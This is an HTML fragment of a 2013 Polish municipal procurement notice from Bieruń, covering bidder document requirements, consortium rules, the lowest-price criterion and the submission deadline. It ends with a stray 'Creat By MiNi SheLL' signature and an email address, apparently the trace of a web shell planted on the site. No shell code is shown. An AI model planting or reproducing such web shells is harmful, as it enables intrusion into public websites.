<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1.	Oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  
       nakładają obowiązek posiadania takich uprawnień;
2)	posiada wiedzę i doświadczenie do wykonania zamówienia; 
3)	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć pełnomocnictwo (ciąg pełnomocnictw), w formie oryginału lub notarialnie poświadczonej kopii. 
B. Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
        dostarcza oświadczenia i dokumenty wymienione w pkt. A Lista wymaganych oświadczeń   
    oraz  w pkt. B Lista wymaganych dokumentów.
        1) Zamiast dokumentów, o których mowa w punktach  3, 4 i 5 Listy wymaganych dokumentów 
       przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
       zamieszkania, potwierdzające odpowiednio, że:
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
       b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
           albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
           płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
 Dokument z pkt 1a)  powinien być  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
 składania ofert.
        Dokument z pkt 1 b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem    
        terminu składania ofert.
        Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub 
        miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je
        dokumentem zawierającym oświadczenie , w którym określa się także osoby uprawnione do 
        reprezentacji wykonawcy złożone przed, właściwym organem sądowym, administracyjnym albo 
        organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania  
        osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed 
        notariuszem.        
        Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa w pkt 1.
      2)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
      3)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku  
            innych podmiotów , na zasobach których wykonawca polega na zasadach określonych 
            w art.26 ust. 2b ustawy pzp , kopie dokumentów dotyczących odpowiednio wykonawcy lub 
            podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te 
            podmioty.
    4)  Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
         Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać w szczególności:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego (wskazanie konkretnych zasobów podmiotu trzeciego, 
            którymi wykonawca będzie dysponował przy realizacji zamówienia),
         -  czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie zobowiązanie wykonane przy 
            realizacji zamówienia ( w realizacji której części zamówienia będzie brał udział podmiot trzeci  
            i w jakiej formie np. podwykonawstwo),
         -  jakiego okresu dotyczy zobowiązanie.
         W sytuacji  gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu 
         w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
W przypadku, gdy wykonawca polega na zasobach innych podmiotów przy wykazaniu spełnienia 
         warunku  wiedzy i doświadczenia, należy wykazać udział tych podmiotów w wykonaniu zamówienia.
    5) Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.
     6) Podmioty występujące wspólnie
         W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/  
       spółki cywilnej) do oferty należy dołączyć: 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), 
jego zakresu działania i uprawnień do reprezentowania wykonawców w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności:
- nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację zamówienia  
i udzielających pełnomocnictwa, 
- nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy, 
- czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie 
  zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- cel zawarcia ( wspólny udział w przetargu i wspólna realizacja zamówienia publicznego),
- datę udzielenia pełnomocnictwa,
- podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,    
  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. 
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/Liderem. 
b)	Oświadczenia wymienione w punkcie V.A.1 SIWZ powinny być złożone w taki sposób, aby 
warunki ,  których mowa w punkcie IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.
   c) Dokumenty wymienione w pkt. V B ppkt. 1, 2 Listy wymaganych dokumentów  powinny być     
       złożone w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący 
       wspólnie spełnili łącznie.
       d) Dokumenty wymienione w pkt. V B ppkt. 3,4,5,6 i 7 Listy wymaganych dokumentów składa każdy                     
            z wykonawców wchodzących w skład podmiotu występującego wspólnie.
       e)  Zgodnie z art. 141 ustawy pzp, wykonawcy wspólnie ubiegający się o udzielenie zamówienia    
            ponoszą solidarną odpowiedzialność za wykonanie umowy.
C. Do oferty zaleca się załączyć informacje  w zakresie części zamówienia, które zostaną 
powierzone podwykonawcom. W przypadku braku złożenia informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
1)  wartości umownej:
a) w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie z obowiązującą              
stawką, 
b) w przypadku zmian ilości wykonanych robót, a wynikających z rozliczenia kosztorysowego 
robót ( ryczałtowo-ilościowego);
2)  zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem  
wymagań określonych w SIWZ, jakie osoby te powinny spełniać; 
	3)  zmiany terminu rozpoczęcia lub zakończenia wykonania przedmiotu umowy, w szczególności:
	a)  z powodu niesprzyjających warunków atmosferycznych( gradobicie, gwałtowne opady,    
     powodzie i inne anomalia klimatyczne),
	b) zmiany przepisów, okoliczności, których nie można było przewidzieć przy                 
udzielaniu zamówienia, 
	c) siły wyższej, 
	d) wystąpienia środków ochrony prawnej w postępowaniu o zamówienie publiczne,
4)  mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana       
powszechnie obowiązujących przepisów prawa; 
5)  zmiany podwykonawcy lub powierzenia podwykonawcy części zakresu zamówienia w przypadku 
wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania oferty; 
6)  zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych, pokój nr 15, II piętro, segment A, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2013 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - Sekretariat, pokój nr 9, I piętro, segment A, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com